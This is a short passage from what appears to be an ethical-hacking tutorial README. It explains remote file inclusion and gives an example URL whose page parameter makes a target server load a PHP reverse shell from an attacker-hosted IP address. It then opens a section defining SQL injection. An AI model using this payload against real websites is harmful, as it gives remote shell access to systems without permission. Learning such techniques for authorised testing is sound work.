RodgerOliver/ethical-hacking/README.md

 For this to work, make a php file that gives you a reverse connection to the target and save it as `.txt`.
 Then put this on you server, copy the link to the file and paste in the string like so `https://website.com/upload/?page=http://192.168.10.26/php-reverse.txt?`

+### SQL Injection

+SQL is the programming language for relational databases.
+A database is where data is stored, like username, emails and passwords.